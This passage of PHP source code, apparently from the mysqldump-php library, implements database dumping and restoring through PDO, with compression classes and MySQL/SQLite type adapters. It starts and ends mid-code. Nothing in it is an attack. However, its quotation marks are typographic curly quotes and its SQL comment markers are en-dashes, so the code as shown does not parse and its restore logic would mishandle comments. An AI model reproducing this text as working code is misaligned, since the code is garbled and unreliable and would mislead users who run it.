$this->dsnArray[strtolower($key)] = $dsn_matches[2][$index]; // [2] will contain values } if (empty($this->dsnArray[‘host’]) && empty($this->dsnArray[‘unix_socket’])) { throw new Exception(“Missing host from DSN string”); } $this->host = (!empty($this->dsnArray[‘host’])) ? $this->dsnArray[‘host’] : $this->dsnArray[‘unix_socket’]; if (empty($this->dsnArray[‘dbname’])) { throw new Exception(“Missing database name from DSN string”); } $this->dbName = $this->dsnArray[‘dbname’]; return true; } /** * Connect with PDO. * * @return null */ private function connect() { // Connecting with PDO. try { switch ($this->dbType) { case ‘sqlite’: $this->dbHandler = @new PDO(“sqlite:”.$this->dbName, null, null, $this->pdoSettings); break; case ‘mysql’: case ‘pgsql’: case ‘dblib’: $this->dbHandler = @new PDO( $this->dsn, $this->user, $this->pass, $this->pdoSettings ); // Execute init commands once connected foreach ($this->dumpSettings[‘init_commands’] as $stmt) { $this->dbHandler->exec($stmt); } // Store server version $this->version = $this->dbHandler->getAttribute(PDO::ATTR_SERVER_VERSION); break; default: throw new Exception(“Unsupported database type (“.$this->dbType.”)”); } } catch (PDOException $e) { throw new Exception( “Connection to “.$this->dbType.” failed with message: “. $e->getMessage() ); } if (is_null($this->dbHandler)) { throw new Exception(“Connection to “.$this->dbType.”failed”); } $this->dbHandler->setAttribute(PDO::ATTR_ORACLE_NULLS, PDO::NULL_NATURAL); $this->typeAdapter = TypeAdapterFactory::create($this->dbType, $this->dbHandler, $this->dumpSettings); } /** * Primary function, triggers dumping. * * @param string $filename Name of file to write sql dump to * @return null * @throws \Exception */ public function start($filename = ”, $append = false) { // Output file can be redefined here if (!empty($filename)) { $this->fileName = $filename; } // Connect to database $this->connect(); // Create output file $this->compressManager->open($this->fileName, $append); // Write some basic info to output file $this->compressManager->write($this->getDumpFileHeader()); // Store server settings and use sanner defaults to dump $this->compressManager->write( $this->typeAdapter->backup_parameters() ); if ($this->dumpSettings[‘databases’]) { $this->compressManager->write( $this->typeAdapter->getDatabaseHeader($this->dbName) ); if ($this->dumpSettings[‘add-drop-database’]) { $this->compressManager->write( $this->typeAdapter->add_drop_database($this->dbName) ); } } // Get table, view, trigger, procedures, functions and events structures from // database. $this->getDatabaseStructureTables(); $this->getDatabaseStructureViews(); $this->getDatabaseStructureTriggers(); $this->getDatabaseStructureProcedures(); $this->getDatabaseStructureFunctions(); $this->getDatabaseStructureEvents(); if ($this->dumpSettings[‘databases’]) { $this->compressManager->write( $this->typeAdapter->databases($this->dbName) ); } // If there still are some tables/views in include-tables array, // that means that some tables or views weren’t found. // Give proper error and exit. // This check will be removed once include-tables supports regexps. if (0 < count($this->dumpSettings[‘include-tables’])) { $name = implode(“,”, $this->dumpSettings[‘include-tables’]); throw new Exception(“Table (“.$name.”) not found in database”); } $this->exportTables(); $this->exportTriggers(); $this->exportFunctions(); $this->exportProcedures(); $this->exportViews(); $this->exportEvents(); // Restore saved parameters. $this->compressManager->write( $this->typeAdapter->restore_parameters() ); // Write some stats to output file. $this->compressManager->write($this->getDumpFileFooter()); // Close output file. $this->compressManager->close(); return; } /** * Primary restore function, triggers restore of db dump. * * @param string $filename Name of file to read sql dump from * @return null * @throws \Exception */ public function restore($filename = ”) { // Connect to database $this->connect(); $sql = ”; $error = ”; $response = NULL; $delimiter_in_use = ‘;’; $delimiter_length = strlen($delimiter_in_use); if ( file_exists( $filename ) && is_readable( $filename ) ) { $fh = fopen( $filename, ‘r’ ); while ( ( $line = fgets( $fh ) ) !== FALSE ) { $line = trim($line); // cleanup any whitespace for consistent string search functionality // Ignoring comments from the SQL script if ( substr($line, 0, 2) == ‘–‘ || $line == ” ) { continue; } // start of delimitier – keep track of it if ( substr($line, 0, 10) == ‘DELIMITER ‘ ) { $delimiter_in_use = substr($line, 10); $delimiter_length = strlen($delimiter_in_use); continue; // skip this line – this directive is only for the interpretor } $sql .= PHP_EOL . $line; if ( substr($line, – $delimiter_length ) == $delimiter_in_use) { // drop the delimiter $sql = substr( $sql, 0, – $delimiter_length ); $result = $this->dbHandler->query( $sql ); if (! $result) { $error .= $this->dbHandler->errorInfo() . “\n”; } $sql = ”; } } // end foreach fclose( $fh ); if ($error) { $response = array( “type” => “error”, “message” => $error ); } else { $response = array( “type” => “success”, “message” => “Database Restore Completed Successfully.” ); } } // end if file exists return $response; } /** * Returns header for dump file. * * @return string */ private function getDumpFileHeader() { $header = ”; if (!$this->dumpSettings[‘skip-comments’]) { // Some info about software, source and time $header = “– mysqldump-php https://github.com/ifsnop/mysqldump-php”.PHP_EOL. “–“.PHP_EOL. “– Host: {$this->host}\tDatabase: {$this->dbName}”.PHP_EOL. “– ——————————————————“.PHP_EOL; if (!empty($this->version)) { $header .= “– Server version \t”.$this->version.PHP_EOL; } if (!$this->dumpSettings[‘skip-dump-date’]) { $header .= “– Date: “.date(‘r’).PHP_EOL.PHP_EOL; } } return $header; } /** * Returns footer for dump file. * * @return string */ private function getDumpFileFooter() { $footer = ”; if (!$this->dumpSettings[‘skip-comments’]) { $footer .= ‘– Dump completed’; if (!$this->dumpSettings[‘skip-dump-date’]) { $footer .= ‘ on: ‘.date(‘r’); } $footer .= PHP_EOL; } return $footer; } /** * Reads table names from database. * Fills $this->tables array so they will be dumped later. * * @return null */ private function getDatabaseStructureTables() { // Listing all tables from database if (empty($this->dumpSettings[‘include-tables’])) { // include all tables for now, blacklisting happens later foreach ($this->dbHandler->query($this->typeAdapter->show_tables($this->dbName)) as $row) { array_push($this->tables, current($row)); } } else { // include only the tables mentioned in include-tables foreach ($this->dbHandler->query($this->typeAdapter->show_tables($this->dbName)) as $row) { if (in_array(current($row), $this->dumpSettings[‘include-tables’], true)) { array_push($this->tables, current($row)); $elem = array_search( current($row), $this->dumpSettings[‘include-tables’] ); unset($this->dumpSettings[‘include-tables’][$elem]); } } } return; } /** * Reads view names from database. * Fills $this->tables array so they will be dumped later. * * @return null */ private function getDatabaseStructureViews() { // Listing all views from database if (empty($this->dumpSettings[‘include-views’])) { // include all views for now, blacklisting happens later foreach ($this->dbHandler->query($this->typeAdapter->show_views($this->dbName)) as $row) { array_push($this->views, current($row)); } } else { // include only the tables mentioned in include-tables foreach ($this->dbHandler->query($this->typeAdapter->show_views($this->dbName)) as $row) { if (in_array(current($row), $this->dumpSettings[‘include-views’], true)) { array_push($this->views, current($row)); $elem = array_search( current($row), $this->dumpSettings[‘include-views’] ); unset($this->dumpSettings[‘include-views’][$elem]); } } } return; } /** * Reads trigger names from database. * Fills $this->tables array so they will be dumped later. * * @return null */ private function getDatabaseStructureTriggers() { // Listing all triggers from database if (false === $this->dumpSettings[‘skip-triggers’]) { foreach ($this->dbHandler->query($this->typeAdapter->show_triggers($this->dbName)) as $row) { array_push($this->triggers, $row[‘Trigger’]); } } return; } /** * Reads procedure names from database. * Fills $this->tables array so they will be dumped later. * * @return null */ private function getDatabaseStructureProcedures() { // Listing all procedures from database if ($this->dumpSettings[‘routines’]) { foreach ($this->dbHandler->query($this->typeAdapter->show_procedures($this->dbName)) as $row) { array_push($this->procedures, $row[‘procedure_name’]); } } return; } /** * Reads functions names from database. * Fills $this->tables array so they will be dumped later. * * @return null */ private function getDatabaseStructureFunctions() { // Listing all functions from database if ($this->dumpSettings[‘routines’]) { foreach ($this->dbHandler->query($this->typeAdapter->show_functions($this->dbName)) as $row) { array_push($this->functions, $row[‘function_name’]); } } return; } /** * Reads event names from database. * Fills $this->tables array so they will be dumped later. * * @return null */ private function getDatabaseStructureEvents() { // Listing all events from database if ($this->dumpSettings[‘events’]) { foreach ($this->dbHandler->query($this->typeAdapter->show_events($this->dbName)) as $row) { array_push($this->events, $row[‘event_name’]); } } return; } /** * Compare if $table name matches with a definition inside $arr * @param $table string * @param $arr array with strings or patterns * @return boolean */ private function matches($table, $arr) { $match = false; foreach ($arr as $pattern) { if (‘/’ != $pattern[0]) { continue; } if (1 == preg_match($pattern, $table)) { $match = true; } } return in_array($table, $arr) || $match; } /** * Exports all the tables selected from database * * @return null */ private function exportTables() { // Exporting tables one by one foreach ($this->tables as $table) { if ($this->matches($table, $this->dumpSettings[‘exclude-tables’])) { continue; } $this->getTableStructure($table); if (false === $this->dumpSettings[‘no-data’]) { // don’t break compatibility with old trigger $this->listValues($table); } elseif (true === $this->dumpSettings[‘no-data’] || $this->matches($table, $this->dumpSettings[‘no-data’])) { continue; } else { $this->listValues($table); } } } /** * Exports all the views found in database * * @return null */ private function exportViews() { if (false === $this->dumpSettings[‘no-create-info’]) { // Exporting views one by one foreach ($this->views as $view) { if ($this->matches($view, $this->dumpSettings[‘exclude-tables’])) { continue; } $this->tableColumnTypes[$view] = $this->getTableColumnTypes($view); $this->getViewStructureTable($view); } foreach ($this->views as $view) { if ($this->matches($view, $this->dumpSettings[‘exclude-tables’])) { continue; } $this->getViewStructureView($view); } } } /** * Exports all the triggers found in database * * @return null */ private function exportTriggers() { // Exporting triggers one by one foreach ($this->triggers as $trigger) { $this->getTriggerStructure($trigger); } } /** * Exports all the procedures found in database * * @return null */ private function exportProcedures() { // Exporting triggers one by one foreach ($this->procedures as $procedure) { $this->getProcedureStructure($procedure); } } /** * Exports all the functions found in database * * @return null */ private function exportFunctions() { // Exporting triggers one by one foreach ($this->functions as $function) { $this->getFunctionStructure($function); } } /** * Exports all the events found in database * * @return null */ private function exportEvents() { // Exporting triggers one by one foreach ($this->events as $event) { $this->getEventStructure($event); } } /** * Table structure extractor * * @todo move specific mysql code to typeAdapter * @param string $tableName Name of table to export * @return null */ private function getTableStructure($tableName) { if (!$this->dumpSettings[‘no-create-info’]) { $ret = ”; if (!$this->dumpSettings[‘skip-comments’]) { $ret = “–“.PHP_EOL. “– Table structure for table `$tableName`”.PHP_EOL. “–“.PHP_EOL.PHP_EOL; } $stmt = $this->typeAdapter->show_create_table($tableName); foreach ($this->dbHandler->query($stmt) as $r) { $this->compressManager->write($ret); if ($this->dumpSettings[‘add-drop-table’]) { $this->compressManager->write( $this->typeAdapter->drop_table($tableName) ); } $this->compressManager->write( $this->typeAdapter->create_table($r) ); break; } } $this->tableColumnTypes[$tableName] = $this->getTableColumnTypes($tableName); return; } /** * Store column types to create data dumps and for Stand-In tables * * @param string $tableName Name of table to export * @return array type column types detailed */ private function getTableColumnTypes($tableName) { $columnTypes = array(); $columns = $this->dbHandler->query( $this->typeAdapter->show_columns($tableName) ); $columns->setFetchMode(PDO::FETCH_ASSOC); foreach ($columns as $key => $col) { $types = $this->typeAdapter->parseColumnType($col); $columnTypes[$col[‘Field’]] = array( ‘is_numeric’=> $types[‘is_numeric’], ‘is_blob’ => $types[‘is_blob’], ‘type’ => $types[‘type’], ‘type_sql’ => $col[‘Type’], ‘is_virtual’ => $types[‘is_virtual’] ); } return $columnTypes; } /** * View structure extractor, create table (avoids cyclic references) * * @todo move mysql specific code to typeAdapter * @param string $viewName Name of view to export * @return null */ private function getViewStructureTable($viewName) { if (!$this->dumpSettings[‘skip-comments’]) { $ret = “–“.PHP_EOL. “– Stand-In structure for view `${viewName}`”.PHP_EOL. “–“.PHP_EOL.PHP_EOL; $this->compressManager->write($ret); } $stmt = $this->typeAdapter->show_create_view($viewName); // create views as tables, to resolve dependencies foreach ($this->dbHandler->query($stmt) as $r) { if ($this->dumpSettings[‘add-drop-table’]) { $this->compressManager->write( $this->typeAdapter->drop_view($viewName) ); } $this->compressManager->write( $this->createStandInTable($viewName) ); break; } } /** * Write a create table statement for the table Stand-In, show create * table would return a create algorithm when used on a view * * @param string $viewName Name of view to export * @return string create statement */ public function createStandInTable($viewName) { $ret = array(); foreach ($this->tableColumnTypes[$viewName] as $k => $v) { $ret[] = “`${k}` ${v[‘type_sql’]}”; } $ret = implode(PHP_EOL.”,”, $ret); $ret = “CREATE TABLE IF NOT EXISTS `$viewName` (“. PHP_EOL.$ret.PHP_EOL.”);”.PHP_EOL; return $ret; } /** * View structure extractor, create view * * @todo move mysql specific code to typeAdapter * @param string $viewName Name of view to export * @return null */ private function getViewStructureView($viewName) { if (!$this->dumpSettings[‘skip-comments’]) { $ret = “–“.PHP_EOL. “– View structure for view `${viewName}`”.PHP_EOL. “–“.PHP_EOL.PHP_EOL; $this->compressManager->write($ret); } $stmt = $this->typeAdapter->show_create_view($viewName); // create views, to resolve dependencies // replacing tables with views foreach ($this->dbHandler->query($stmt) as $r) { // because we must replace table with view, we should delete it $this->compressManager->write( $this->typeAdapter->drop_view($viewName) ); $this->compressManager->write( $this->typeAdapter->create_view($r) ); break; } } /** * Trigger structure extractor * * @param string $triggerName Name of trigger to export * @return null */ private function getTriggerStructure($triggerName) { $stmt = $this->typeAdapter->show_create_trigger($triggerName); foreach ($this->dbHandler->query($stmt) as $r) { if ($this->dumpSettings[‘add-drop-trigger’]) { $this->compressManager->write( $this->typeAdapter->add_drop_trigger($triggerName) ); } $this->compressManager->write( $this->typeAdapter->create_trigger($r) ); return; } } /** * Procedure structure extractor * * @param string $procedureName Name of procedure to export * @return null */ private function getProcedureStructure($procedureName) { if (!$this->dumpSettings[‘skip-comments’]) { $ret = “–“.PHP_EOL. “– Dumping routines for database ‘”.$this->dbName.”‘”.PHP_EOL. “–“.PHP_EOL.PHP_EOL; $this->compressManager->write($ret); } $stmt = $this->typeAdapter->show_create_procedure($procedureName); foreach ($this->dbHandler->query($stmt) as $r) { $this->compressManager->write( $this->typeAdapter->create_procedure($r,$procedureName) ); return; } } /** * Function structure extractor * * @param string $functionName Name of function to export * @return null */ private function getFunctionStructure($functionName) { if (!$this->dumpSettings[‘skip-comments’]) { $ret = “–“.PHP_EOL. “– Dumping routines for database ‘”.$this->dbName.”‘”.PHP_EOL. “–“.PHP_EOL.PHP_EOL; $this->compressManager->write($ret); } $stmt = $this->typeAdapter->show_create_function($functionName); foreach ($this->dbHandler->query($stmt) as $r) { $this->compressManager->write( $this->typeAdapter->create_function($r) ); return; } } /** * Event structure extractor * * @param string $eventName Name of event to export * @return null */ private function getEventStructure($eventName) { if (!$this->dumpSettings[‘skip-comments’]) { $ret = “–“.PHP_EOL. “– Dumping events for database ‘”.$this->dbName.”‘”.PHP_EOL. “–“.PHP_EOL.PHP_EOL; $this->compressManager->write($ret); } $stmt = $this->typeAdapter->show_create_event($eventName); foreach ($this->dbHandler->query($stmt) as $r) { $this->compressManager->write( $this->typeAdapter->create_event($r) ); return; } } /** * Prepare values for output * * @param string $tableName Name of table which contains rows * @param array $row Associative array of column names and values to be * quoted * * @return array */ private function prepareColumnValues($tableName, $row) { $ret = array(); $columnTypes = $this->tableColumnTypes[$tableName]; foreach ($row as $colName => $colValue) { $colValue = $this->hookTransformColumnValue($tableName, $colName, $colValue, $row); $ret[] = $this->escape($colValue, $columnTypes[$colName]); } return $ret; } /** * Escape values with quotes when needed * * @param string $tableName Name of table which contains rows * @param array $row Associative array of column names and values to be quoted * * @return string */ private function escape($colValue, $colType) { if (is_null($colValue)) { return “NULL”; } elseif ($this->dumpSettings[‘hex-blob’] && $colType[‘is_blob’]) { if ($colType[‘type’] == ‘bit’ || !empty($colValue)) { return “0x${colValue}”; } else { return “””; } } elseif ($colType[‘is_numeric’]) { return $colValue; } return $this->dbHandler->quote($colValue); } /** * Set a callable that will will be used to transform column values. * * @param callable $callable * * @return void */ public function setTransformColumnValueHook($callable) { $this->transformColumnValueCallable = $callable; } /** * Set a callable that will be used to report dump information * * @param callable $callable * * @return void */ public function setInfoHook($callable) { $this->infoCallable = $callable; } /** * Give extending classes an opportunity to transform column values * * @param string $tableName Name of table which contains rows * @param string $colName Name of the column in question * @param string $colValue Value of the column in question * @param array $row Full row * * @return string */ protected function hookTransformColumnValue($tableName, $colName, $colValue, $row) { if (!$this->transformColumnValueCallable) { return $colValue; } return call_user_func_array($this->transformColumnValueCallable, array( $tableName, $colName, $colValue, $row )); } /** * Table rows extractor * * @param string $tableName Name of table to export * * @return null */ private function listValues($tableName) { $this->prepareListValues($tableName); $onlyOnce = true; $lineSize = 0; // colStmt is used to form a query to obtain row values $colStmt = $this->getColumnStmt($tableName); // colNames is used to get the name of the columns when using complete-insert if ($this->dumpSettings[‘complete-insert’]) { $colNames = $this->getColumnNames($tableName); } $stmt = “SELECT “.implode(“,”, $colStmt).” FROM `$tableName`”; // Table specific conditions override the default ‘where’ $condition = $this->getTableWhere($tableName); if ($condition) { $stmt .= ” WHERE {$condition}”; } $limit = $this->getTableLimit($tableName); if ($limit) { $stmt .= ” LIMIT {$limit}”; } $resultSet = $this->dbHandler->query($stmt); $resultSet->setFetchMode(PDO::FETCH_ASSOC); $ignore = $this->dumpSettings[‘insert-ignore’] ? ‘ IGNORE’ : ”; $count = 0; foreach ($resultSet as $row) { $count++; $vals = $this->prepareColumnValues($tableName, $row); if ($onlyOnce || !$this->dumpSettings[‘extended-insert’]) { if ($this->dumpSettings[‘complete-insert’]) { $lineSize += $this->compressManager->write( “INSERT$ignore INTO `$tableName` (“. implode(“, “, $colNames). “) VALUES (“.implode(“,”, $vals).”)” ); } else { $lineSize += $this->compressManager->write( “INSERT$ignore INTO `$tableName` VALUES (“.implode(“,”, $vals).”)” ); } $onlyOnce = false; } else { $lineSize += $this->compressManager->write(“,(“.implode(“,”, $vals).”)”); } if (($lineSize > $this->dumpSettings[‘net_buffer_length’]) || !$this->dumpSettings[‘extended-insert’]) { $onlyOnce = true; $lineSize = $this->compressManager->write(“;”.PHP_EOL); } } $resultSet->closeCursor(); if (!$onlyOnce) { $this->compressManager->write(“;”.PHP_EOL); } $this->endListValues($tableName, $count); if ($this->infoCallable) { call_user_func($this->infoCallable, ‘table’, array(‘name’ => $tableName, ‘rowCount’ => $count)); } } /** * Table rows extractor, append information prior to dump * * @param string $tableName Name of table to export * * @return null */ public function prepareListValues($tableName) { if (!$this->dumpSettings[‘skip-comments’]) { $this->compressManager->write( “–“.PHP_EOL. “– Dumping data for table `$tableName`”.PHP_EOL. “–“.PHP_EOL.PHP_EOL ); } if ($this->dumpSettings[‘single-transaction’]) { $this->dbHandler->exec($this->typeAdapter->setup_transaction()); $this->dbHandler->exec($this->typeAdapter->start_transaction()); } if ($this->dumpSettings[‘lock-tables’] && !$this->dumpSettings[‘single-transaction’]) { $this->typeAdapter->lock_table($tableName); } if ($this->dumpSettings[‘add-locks’]) { $this->compressManager->write( $this->typeAdapter->start_add_lock_table($tableName) ); } if ($this->dumpSettings[‘disable-keys’]) { $this->compressManager->write( $this->typeAdapter->start_add_disable_keys($tableName) ); } // Disable autocommit for faster reload if ($this->dumpSettings[‘no-autocommit’]) { $this->compressManager->write( $this->typeAdapter->start_disable_autocommit() ); } return; } /** * Table rows extractor, close locks and commits after dump * * @param string $tableName Name of table to export. * @param integer $count Number of rows inserted. * * @return void */ public function endListValues($tableName, $count = 0) { if ($this->dumpSettings[‘disable-keys’]) { $this->compressManager->write( $this->typeAdapter->end_add_disable_keys($tableName) ); } if ($this->dumpSettings[‘add-locks’]) { $this->compressManager->write( $this->typeAdapter->end_add_lock_table($tableName) ); } if ($this->dumpSettings[‘single-transaction’]) { $this->dbHandler->exec($this->typeAdapter->commit_transaction()); } if ($this->dumpSettings[‘lock-tables’] && !$this->dumpSettings[‘single-transaction’]) { $this->typeAdapter->unlock_table($tableName); } // Commit to enable autocommit if ($this->dumpSettings[‘no-autocommit’]) { $this->compressManager->write( $this->typeAdapter->end_disable_autocommit() ); } $this->compressManager->write(PHP_EOL); if (!$this->dumpSettings[‘skip-comments’]) { $this->compressManager->write( “– Dumped table `”.$tableName.”` with $count row(s)”.PHP_EOL. ‘–‘.PHP_EOL.PHP_EOL ); } return; } /** * Build SQL List of all columns on current table which will be used for selecting * * @param string $tableName Name of table to get columns * * @return array SQL sentence with columns for select */ public function getColumnStmt($tableName) { $colStmt = array(); foreach ($this->tableColumnTypes[$tableName] as $colName => $colType) { if ($colType[‘type’] == ‘bit’ && $this->dumpSettings[‘hex-blob’]) { $colStmt[] = “LPAD(HEX(`${colName}`),2,’0′) AS `${colName}`”; } elseif ($colType[‘is_blob’] && $this->dumpSettings[‘hex-blob’]) { $colStmt[] = “HEX(`${colName}`) AS `${colName}`”; } elseif ($colType[‘is_virtual’]) { $this->dumpSettings[‘complete-insert’] = true; continue; } else { $colStmt[] = “`${colName}`”; } } return $colStmt; } /** * Build SQL List of all columns on current table which will be used for inserting * * @param string $tableName Name of table to get columns * * @return array columns for sql sentence for insert */ public function getColumnNames($tableName) { $colNames = array(); foreach ($this->tableColumnTypes[$tableName] as $colName => $colType) { if ($colType[‘is_virtual’]) { $this->dumpSettings[‘complete-insert’] = true; continue; } else { $colNames[] = “`${colName}`”; } } return $colNames; } } /** * Enum with all available compression methods * */ abstract class CompressMethod { public static $enums = array( Mysqldump::NONE, Mysqldump::GZIP, Mysqldump::BZIP2, Mysqldump::GZIPSTREAM, ); /** * @param string $c * @return boolean */ public static function isValid($c) { return in_array($c, self::$enums); } } abstract class CompressManagerFactory { /** * @param string $c * @return CompressBzip2|CompressGzip|CompressNone */ public static function create($c) { $c = ucfirst(strtolower($c)); if (!CompressMethod::isValid($c)) { throw new Exception(“Compression method ($c) is not defined yet”); } $method = __NAMESPACE__.”\\”.”Compress”.$c; return new $method; } } class CompressBzip2 extends CompressManagerFactory { private $fileHandler = null; public function __construct() { if (!function_exists(“bzopen”)) { throw new Exception(“Compression is enabled, but bzip2 lib is not installed or configured properly”); } } /** * @param string $filename */ public function open($filename) { $this->fileHandler = bzopen($filename, “w”); if (false === $this->fileHandler) { throw new Exception(“Output file is not writable”); } return true; } public function write($str) { $bytesWritten = bzwrite($this->fileHandler, $str); if (false === $bytesWritten) { throw new Exception(“Writting to file failed! Probably, there is no more free space left?”); } return $bytesWritten; } public function close() { return bzclose($this->fileHandler); } } class CompressGzip extends CompressManagerFactory { private $fileHandler = null; public function __construct() { if (!function_exists(“gzopen”)) { throw new Exception(“Compression is enabled, but gzip lib is not installed or configured properly”); } } /** * @param string $filename */ public function open($filename) { $this->fileHandler = gzopen($filename, “wb”); if (false === $this->fileHandler) { throw new Exception(“Output file is not writable”); } return true; } public function write($str) { $bytesWritten = gzwrite($this->fileHandler, $str); if (false === $bytesWritten) { throw new Exception(“Writting to file failed! Probably, there is no more free space left?”); } return $bytesWritten; } public function close() { return gzclose($this->fileHandler); } } class CompressNone extends CompressManagerFactory { private $fileHandler = null; /** * @param string $filename */ public function open($filename, $append = false) { $mode = $append ? ‘ab’ : ‘wb’; $this->fileHandler = fopen($filename, $mode); if (false === $this->fileHandler) { throw new Exception(“Output file is not writable”); } return true; } public function write($str) { $bytesWritten = fwrite($this->fileHandler, $str); if (false === $bytesWritten) { throw new Exception(“Writting to file failed! Probably, there is no more free space left?”); } return $bytesWritten; } public function close() { return fclose($this->fileHandler); } } class CompressGzipstream extends CompressManagerFactory { private $fileHandler = null; private $compressContext; /** * @param string $filename */ public function open($filename) { $this->fileHandler = fopen($filename, “wb”); if (false === $this->fileHandler) { throw new Exception(“Output file is not writable”); } $this->compressContext = deflate_init(ZLIB_ENCODING_GZIP, array(‘level’ => 9)); return true; } public function write($str) { $bytesWritten = fwrite($this->fileHandler, deflate_add($this->compressContext, $str, ZLIB_NO_FLUSH)); if (false === $bytesWritten) { throw new Exception(“Writting to file failed! Probably, there is no more free space left?”); } return $bytesWritten; } public function close() { fwrite($this->fileHandler, deflate_add($this->compressContext, ”, ZLIB_FINISH)); return fclose($this->fileHandler); } } /** * Enum with all available TypeAdapter implementations * */ abstract class TypeAdapter { public static $enums = array( “Sqlite”, “Mysql” ); /** * @param string $c * @return boolean */ public static function isValid($c) { return in_array($c, self::$enums); } } /** * TypeAdapter Factory * */ abstract class TypeAdapterFactory { protected $dbHandler = null; protected $dumpSettings = array(); /** * @param string $c Type of database factory to create (Mysql, Sqlite,…) * @param PDO $dbHandler */ public static function create($c, $dbHandler = null, $dumpSettings = array()) { $c = ucfirst(strtolower($c)); if (!TypeAdapter::isValid($c)) { throw new Exception(“Database type support for ($c) not yet available”); } $method = __NAMESPACE__.”\\”.”TypeAdapter”.$c; return new $method($dbHandler, $dumpSettings); } public function __construct($dbHandler = null, $dumpSettings = array()) { $this->dbHandler = $dbHandler; $this->dumpSettings = $dumpSettings; } /** * function databases Add sql to create and use database * @todo make it do something with sqlite */ public function databases() { return “”; } public function show_create_table($tableName) { return “SELECT tbl_name as ‘Table’, sql as ‘Create Table’ “. “FROM sqlite_master “. “WHERE type=’table’ AND tbl_name=’$tableName'”; } /** * function create_table Get table creation code from database * @todo make it do something with sqlite */ public function create_table($row) { return “”; } public function show_create_view($viewName) { return “SELECT tbl_name as ‘View’, sql as ‘Create View’ “. “FROM sqlite_master “. “WHERE type=’view’ AND tbl_name=’$viewName'”; } /** * function create_view Get view creation code from database * @todo make it do something with sqlite */ public function create_view($row) { return “”; } /** * function show_create_trigger Get trigger creation code from database * @todo make it do something with sqlite */ public function show_create_trigger($triggerName) { return “”; } /** * function create_trigger Modify trigger code, add delimiters, etc * @todo make it do something with sqlite */ public function create_trigger($triggerName) { return “”; } /** * function create_procedure Modify procedure code, add delimiters, etc * @todo make it do something with sqlite */ public function create_procedure($row, $procedureName) { return “”; } /** * function create_function Modify function code, add delimiters, etc * @todo make it do something with sqlite */ public function create_function($functionName) { return “”; } public function show_tables() { return “SELECT tbl_name FROM sqlite_master WHERE type=’table'”; } public function show_views() { return “SELECT tbl_name FROM sqlite_master WHERE type=’view'”; } public function show_triggers() { return “SELECT name FROM sqlite_master WHERE type=’trigger'”; } public function show_columns() { if (func_num_args() != 1) { return “”; } $args = func_get_args(); return “pragma table_info(${args[0]})”; } public function show_procedures() { return “”; } public function show_functions() { return “”; } public function show_events() { return “”; } public function setup_transaction() { return “”; } public function start_transaction() { return “BEGIN EXCLUSIVE”; } public function commit_transaction() { return “COMMIT”; } public function lock_table() { return “”; } public function unlock_table() { return “”; } public function start_add_lock_table() { return PHP_EOL; } public function end_add_lock_table() { return PHP_EOL; } public function start_add_disable_keys() { return PHP_EOL; } public function end_add_disable_keys() { return PHP_EOL; } public function start_disable_foreign_keys_check() { return PHP_EOL; } public function end_disable_foreign_keys_check() { return PHP_EOL; } public function add_drop_database() { return PHP_EOL; } public function add_drop_trigger() { return PHP_EOL; } public function drop_table() { return PHP_EOL; } public function drop_view() { return PHP_EOL; } /** * Decode column metadata and fill info structure. * type, is_numeric and is_blob will always be available. * * @param array $colType Array returned from “SHOW COLUMNS FROM tableName” * @return array */ public function parseColumnType($colType) { return array(); } public function backup_parameters() { return PHP_EOL; } public function restore_parameters() { return PHP_EOL; } } class TypeAdapterPgsql extends TypeAdapterFactory { } class TypeAdapterDblib extends TypeAdapterFactory { } class TypeAdapterSqlite extends TypeAdapterFactory { } class TypeAdapterMysql extends TypeAdapterFactory { const DEFINER_RE = ‘DEFINER=`(?:[^`]|“)*`@`(?:[^`]|“)*`’; // Numerical Mysql types public $mysqlTypes = array( ‘numerical’ => array( ‘bit’, ‘tinyint’, ‘smallint’, ‘mediumint’, ‘int’, ‘integer’, ‘bigint’, ‘real’, ‘double’, ‘float’, ‘decimal’, ‘numeric’ ), ‘blob’ => array( ‘tinyblob’, ‘blob’, ‘mediumblob’, ‘longblob’, ‘binary’, ‘varbinary’, ‘bit’, ‘geometry’, /* http://bugs.mysql.com/bug.php?id=43544 */ ‘point’, ‘linestring’, ‘polygon’, ‘multipoint’, ‘multilinestring’, ‘multipolygon’, ‘geometrycollection’, ) ); public function databases() { $this->check_parameters(func_num_args(), $expected_num_args = 1, __METHOD__); $args = func_get_args(); $databaseName = $args[0]; $resultSet = $this->dbHandler->query(“SHOW VARIABLES LIKE ‘character_set_database’;”); $characterSet = $resultSet->fetchColumn(1); $resultSet->closeCursor(); $resultSet = $this->dbHandler->query(“SHOW VARIABLES LIKE ‘collation_database’;”); $collationDb = $resultSet->fetchColumn(1); $resultSet->closeCursor(); $ret = “”; $ret .= “CREATE DATABASE /*!32312 IF NOT EXISTS*/ `${databaseName}`”. ” /*!40100 DEFAULT CHARACTER SET ${characterSet} “. ” COLLATE ${collationDb} */;”.PHP_EOL.PHP_EOL. “USE `${databaseName}`;”.PHP_EOL.PHP_EOL; return $ret; } public function show_create_table($tableName) { return “SHOW CREATE TABLE `$tableName`”; } public function show_create_view($viewName) { return “SHOW CREATE VIEW `$viewName`”; } public function show_create_trigger($triggerName) { return “SHOW CREATE TRIGGER `$triggerName`”; } public function show_create_procedure($procedureName) { return “SHOW CREATE PROCEDURE `$procedureName`”; } public function show_create_function($functionName) { return “SHOW CREATE FUNCTION `$functionName`”; } public function show_create_event($eventName) { return “SHOW CREATE EVENT `$eventName`”; } public function create_table($row) { if (!isset($row[‘Create Table’])) { throw new Exception(“Error getting table code, unknown output”); } $createTable = $row[‘Create Table’]; if ($this->dumpSettings[‘reset-auto-increment’]) { $match = “/AUTO_INCREMENT=[0-9]+/s”; $replace = “”; $createTable = preg_replace($match, $replace, $createTable); } $ret = “/*!40101 SET @saved_cs_client = @@character_set_client */;”.PHP_EOL. “/*!40101 SET character_set_client = “.$this->dumpSettings[‘default-character-set’].” */;”.PHP_EOL. $createTable.”;”.PHP_EOL. “/*!40101 SET character_set_client = @saved_cs_client */;”.PHP_EOL. PHP_EOL; return $ret; } public function create_view($row) { $ret = “”; if (!isset($row[‘Create View’])) { throw new Exception(“Error getting view structure, unknown output”); } $viewStmt = $row[‘Create View’]; $definerStr = $this->dumpSettings[‘skip-definer’] ? ” : ‘/*!50013 \2 */’.PHP_EOL; if ($viewStmtReplaced = preg_replace( ‘/^(CREATE(?:\s+ALGORITHM=(?:UNDEFINED|MERGE|TEMPTABLE))?)\s+(‘ .self::DEFINER_RE.'(?:\s+SQL SECURITY DEFINER|INVOKER)?)?\s+(VIEW .+)$/s’, ‘/*!50001 \1 */’.PHP_EOL.$definerStr.’/*!50001 \3 */’, $viewStmt, 1 )) { $viewStmt = $viewStmtReplaced; 